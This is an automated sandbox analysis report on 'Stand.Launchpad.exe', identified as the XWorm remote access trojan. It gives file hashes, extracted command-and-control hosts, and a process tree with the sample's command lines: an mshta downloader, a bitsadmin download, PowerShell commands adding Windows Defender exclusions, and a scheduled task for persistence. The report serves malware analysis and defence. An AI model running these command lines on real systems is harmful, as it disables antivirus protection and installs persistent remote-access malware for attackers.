Analysis

  • max time kernel
    145s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-05-2024 04:12

General

  • Target

    Stand.Launchpad.exe

  • Size

    140KB

  • MD5

    bec01d16b6f3c443eb3912042c1fc7f9

  • SHA1

    436c7fabff54997f2e550754edea0ae791080c9b

  • SHA256

    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779

  • SHA512

    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1

  • SSDEEP

    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:40971

us3.localto.net:40971

Name1442-40971.portmap.host:40971

Attributes
  • Install_directory

    %Temp%

  • install_file

    Stand.exe

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:2584
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1640
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {84D18E47-A245-4D5E-BC4A-3643A59487EE} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1876
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2968

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Downloader.hta

    Filesize

    893B

    MD5

    b0a6d4e05dc2225dd03902a3061a4041

    SHA1

    39c500eefbf78d7d51768edb6983c361213cb7b8

    SHA256

    05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee

    SHA512

    96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    08bada4f319ea4dfca2b071b5af72c20

    SHA1

    bb53e82ef774ba900fc4ae9322cee816f27e4d4e

    SHA256

    12f78f810ba3d809182f9e0142ccb0b5c25b8e3eed0c68f73db7aa6edec097f7

    SHA512

    0600b85196e1f3e3f2da20f765a3e1489fd8244646c56d2be9c3736d54c87d20c7c69fab3f7239cd0ea7443a94cd545ff25e80a41f4081175b6a418a1e0c9677

  • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

    Filesize

    108KB

    MD5

    d51da3fa31165f2536dddad44974af34

    SHA1

    703a62d92fbfe23611297715ca50bb82b4ff55a1

    SHA256

    9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210

    SHA512

    3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/1164-60-0x0000000000C90000-0x0000000000CB0000-memory.dmp

    Filesize

    128KB

  • memory/1664-35-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

  • memory/1664-36-0x0000000001F70000-0x0000000001F78000-memory.dmp

    Filesize

    32KB

  • memory/1876-56-0x00000000000D0000-0x00000000000F0000-memory.dmp

    Filesize

    128KB

  • memory/1920-1-0x0000000000A70000-0x0000000000A98000-memory.dmp

    Filesize

    160KB

  • memory/1920-0-0x000007FEF5043000-0x000007FEF5044000-memory.dmp

    Filesize

    4KB

  • memory/2960-29-0x0000000001F70000-0x0000000001F78000-memory.dmp

    Filesize

    32KB

  • memory/2960-28-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

  • memory/2968-62-0x0000000000E50000-0x0000000000E70000-memory.dmp

    Filesize

    128KB

  • memory/3008-57-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

    Filesize

    48KB

  • memory/3008-9-0x0000000000F80000-0x0000000000FA0000-memory.dmp

    Filesize

    128KB